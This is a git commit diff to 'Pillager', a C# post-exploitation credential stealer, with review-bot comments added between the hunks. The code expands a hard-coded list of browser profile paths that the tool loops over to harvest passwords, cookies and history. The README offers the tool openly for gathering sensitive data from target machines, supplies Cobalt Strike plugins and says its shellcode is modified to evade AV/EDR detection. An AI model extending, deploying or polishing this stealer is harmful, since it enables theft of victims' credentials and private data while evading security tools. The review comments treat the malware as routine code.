support more browser
parent
cc29bd7a78
commit
c7fe6b7eeb
|
@ -1,4 +1,5 @@
|
||||||
using System;
|
using System;
|
||||||
|
using System.Collections.Generic;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Security.Cryptography;
|
using System.Security.Cryptography;
|
||||||
using System.Text;
|
using System.Text;
|
||||||
|
@ -14,6 +15,30 @@ namespace Pillager.Browsers
|
||||||
|
|
||||||
public byte[] MasterKey { get; set; }
|
public byte[] MasterKey { get; set; }
|
||||||
|
|
||||||
|
public static Dictionary<string, string> browserOnChromium = new Dictionary<string, string>
|
||||||
|
{
|
||||||
|
{ "Chrome", "Google\\Chrome\\User Data" } ,
|
||||||
|
{ "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
|
||||||
|
{ "Chromium", "Chromium\\User Data" } ,
|
||||||
|
{ "Chrome SxS", "Google\\Chrome SxS\\User Data" },
|
||||||
|
{ "Edge", "Microsoft\\Edge\\User Data" } ,
|
||||||
|
{ "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
|
||||||
|
{ "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
|
||||||
|
{ "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
|
||||||
|
{ "Vivaldi", "Vivaldi\\User Data" } ,
|
||||||
|
{ "CocCoc", "CocCoc\\Browser\\User Data" },
|
||||||
|
{ "Torch", "Torch\\User Data" },
|
||||||
|
{ "Kometa", "Kometa\\User Data" },
|
||||||
|
{ "Orbitum", "Orbitum\\User Data" },
|
||||||
|
{ "CentBrowser", "CentBrowser\\User Data" },
|
||||||
|
{ "7Star", "7Star\\7Star\\User Data" },
|
||||||
|
{ "Sputnik", "Sputnik\\Sputnik\\User Data" },
|
||||||
|
{ "Epic Privacy Browser", "Epic Privacy Browser\\User Data" },
|
||||||
|
{ "Uran", "uCozMedia\\Uran\\User Data" },
|
||||||
|
{ "Yandex", "Yandex\\YandexBrowser\\User Data" },
|
||||||
|
{ "Iridium", "Iridium\\User Data" },
|
||||||
|
};
|
||||||
|
|
||||||
private string[] profiles = {
|
private string[] profiles = {
|
||||||
"Default",
|
"Default",
|
||||||
"Profile 1",
|
"Profile 1",
|
||||||
|
|
|
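Review bot: `browserOnChromium` in the second hunk is a `public static` field without `readonly`, so any code in the assembly can reassign the table that the caller later enumerates; declaring it `public static readonly Dictionary<string, string> browserOnChromium` fixes the reference at no cost. The field also has no comment saying what the pairs mean; something like `// display name -> profile root, relative to the LocalApplicationData folder` would match how the caller combines the value with `Environment.SpecialFolder.LocalApplicationData`. The README table in the same commit lists "Epic Privacy" and has no Iridium row, while the dictionary uses the key "Epic Privacy Browser" and includes "Iridium", so the two lists are out of sync. For defenders, these values are the `User Data` roots a non-browser process would have to open, which makes the table a ready-made path list for file-access monitoring. The enclosing class starts and ends outside the hunk.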
@ -30,25 +30,12 @@ namespace Pillager
|
||||||
//Browsers
|
//Browsers
|
||||||
IE.Save(savepath);
|
IE.Save(savepath);
|
||||||
OldSogou.Save(savepath);//SogouExplorer < 12.x
|
OldSogou.Save(savepath);//SogouExplorer < 12.x
|
||||||
FireFox.Save(savepath);
|
FireFox.Save(savepath);
|
||||||
List<List<string>> browserOnChromium = new List<List<string>>()
|
foreach (var browser in Chrome.browserOnChromium)
|
||||||
{
|
|
||||||
new List<string>() { "Chrome", "Google\\Chrome\\User Data" } ,
|
|
||||||
new List<string>() { "Chrome Beta", "Google\\Chrome Beta\\User Data" } ,
|
|
||||||
new List<string>() { "Chromium", "Chromium\\User Data" } ,
|
|
||||||
new List<string>() { "Edge", "Microsoft\\Edge\\User Data" } ,
|
|
||||||
new List<string>() { "Brave-Browser", "BraveSoftware\\Brave-Browser\\User Data" } ,
|
|
||||||
new List<string>() { "QQBrowser", "Tencent\\QQBrowser\\User Data" } ,
|
|
||||||
new List<string>() { "SogouExplorer", "Sogou\\SogouExplorer\\User Data" } ,
|
|
||||||
new List<string>() { "Vivaldi", "Vivaldi\\User Data" } ,
|
|
||||||
new List<string>() { "CocCoc", "CocCoc\\Browser\\User Data" }
|
|
||||||
//new List<string>() { "", "" } ,
|
|
||||||
};
|
|
||||||
foreach (List<string> browser in browserOnChromium)
|
|
||||||
{
|
{
|
||||||
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
|
string chromepath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData),
|
||||||
browser[1]);
|
browser.Value);
|
||||||
Chrome chrome = new Chrome(browser[0], chromepath);
|
Chrome chrome = new Chrome(browser.Key, chromepath);
|
||||||
chrome.Save(savepath);
|
chrome.Save(savepath);
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
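Review bot: The new `foreach (var browser in Chrome.browserOnChromium)` enumerates a `Dictionary<string, string>`, whose iteration order is unspecified, where the removed code walked a `List` in declaration order; if the order of the saved output matters, that guarantee is gone. Spelling the element type out as `foreach (KeyValuePair<string, string> browser in Chrome.browserOnChromium)` would make `browser.Key` and `browser.Value` self-explanatory, since `var` hides that this is no longer a list of lists. The bodies of the `Chrome` constructor and `Save` are not visible here, but the loop hands every listed `User Data` directory under the local application data folder to one process in a single pass. Several browsers' profile roots being opened in quick succession by one non-browser process is presumably the file-access pattern endpoint telemetry would see. The enclosing method starts and ends outside the hunk.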
55
README.md
55
README.md
|
@ -4,11 +4,9 @@
|
||||||
|
|
||||||
## 介绍
|
## 介绍
|
||||||
|
|
||||||
这是一个敏感信息提取工具,将会长期维护,如果有任何问题或建议,欢迎发issues
|
Pillager是一个适用于后渗透期间的信息收集工具,可以收集目标机器上敏感信息,方便下一步渗透工作的进行。
|
||||||
|
|
||||||
在整理工具的过程中,发现目前的信息提取工具,普遍存在各种问题,最常见的如体积过大,缺少维护,于是自己在现有工具的基础上进行整理,得到了这款工具
|
## 支持
|
||||||
|
|
||||||
目前支持:
|
|
||||||
|
|
||||||
| Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings |
|
| Browser | BookMarks | Cookies | Passwords | Historys | Local Storage | Extension Settings |
|
||||||
| :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: |
|
| :------------ | :-------: | :-----: | :-------: | :------: | :-----------: | :----------------: |
|
||||||
|
@ -16,14 +14,26 @@
|
||||||
| Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Edge | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Chrome | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Chrome Beta | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
|
| Chrome SxS | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Chromium | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
||||||
| Brave-Browser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Brave-Browser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
|
||||||
| QQBrowser | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| QQBrowser | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
|
||||||
| SogouExplorer | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| SogouExplorer | ✅ | ✅ | ✅ | ✅ | 🚧 | 🚧 |
|
||||||
| Vivaldi | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| Vivaldi | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
| CocCoc | ✅ | ✅ | ✅ | ✅ | ✅ | ✅ |
|
| CocCoc | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Torch | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Kometa | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Orbitum | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| CentBrowser | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| 7Star | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Sputnik | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Epic Privacy | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Uran | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
|
| Yandex | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 | 🚧 |
|
||||||
| FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ |
|
| FireFox | ✅ | ✅ | ✅ | ✅ | ❌ | ❌ |
|
||||||
|
|
||||||
|
注:✅表示经过测试,🚧表示理论上支持但未经测试,❌表示无此功能或不支持
|
||||||
|
|
||||||
| IM | Support |
|
| IM | Support |
|
||||||
| -------- | ------------------ |
|
| -------- | ------------------ |
|
||||||
| QQ | ClientKey(Email) |
|
| QQ | ClientKey(Email) |
|
||||||
|
@ -34,14 +44,27 @@
|
||||||
| --------- | ------------------- |
|
| --------- | ------------------- |
|
||||||
| MobaXterm | Password/Credential |
|
| MobaXterm | Password/Credential |
|
||||||
|
|
||||||
|
| Others | Support |
|
||||||
|
| ------ | -------- |
|
||||||
|
| Wifi | Password |
|
||||||
|
|
||||||
后续将会陆续添加支持的软件
|
后续将会陆续添加支持的软件
|
||||||
|
|
||||||
|
## 使用方法
|
||||||
|
|
||||||
|
此项目使用Github Action自动编译打包,并上传至[Release](https://github.com/qwqdanchun/Pillager/releases),其中
|
||||||
|
|
||||||
|
* [Pillager.exe](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.exe) 为.Net Framework v3.5编译生成的exe
|
||||||
|
* [Pillager.bin](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/Pillager.bin) Donut打包的raw格式的shellcode
|
||||||
|
* [cs-plugin.zip](https://github.com/qwqdanchun/Pillager/releases/download/AutoBuild/cs-plugin.zip) 为适用于CobaltStrike使用的插件
|
||||||
|
|
||||||
|
使用CobaltStrike可以直接下载插件包,其他人推荐将shellcode集成至自己的加载器或工具中运行,不建议直接使用Pillager.exe
|
||||||
|
|
||||||
|
执行后会将文件打包至 `%Temp%\Pillager.zip`,需要自行前往目录下载文件或修改代码将文件上传至他处
|
||||||
|
|
||||||
## 优点
|
## 优点
|
||||||
|
|
||||||
体积小,长期维护,shellcode兼容.Net Framework 2.x/3.x/4.x , shellcode兼容x86/x64,执行后文件输出至 `%Temp%\Pillager.zip`
|
* 体积在100kb左右,为同类工具体积的几分之一甚至几十分之一
|
||||||
|
* 支持大部分常见浏览器,常见聊天软件的信息提取,将陆续添加其他常用工具的信息收集
|
||||||
## 编译
|
* 长期维护,有问题可以及时的反馈处理
|
||||||
|
* 使用魔改版本的Donut,缩小shellcode体积,使shellcode兼容.Net Framework v3.5/v4.x,并去除AV/EDR对Donut提取的特征
|
||||||
Release有Github Action自动编译的exe及shellcode,可以直接使用
|
|
||||||
|
|
||||||
为了方便使用,Release附带了cs插件版本,使用Pillager命令即可执行
|
|
||||||
|
|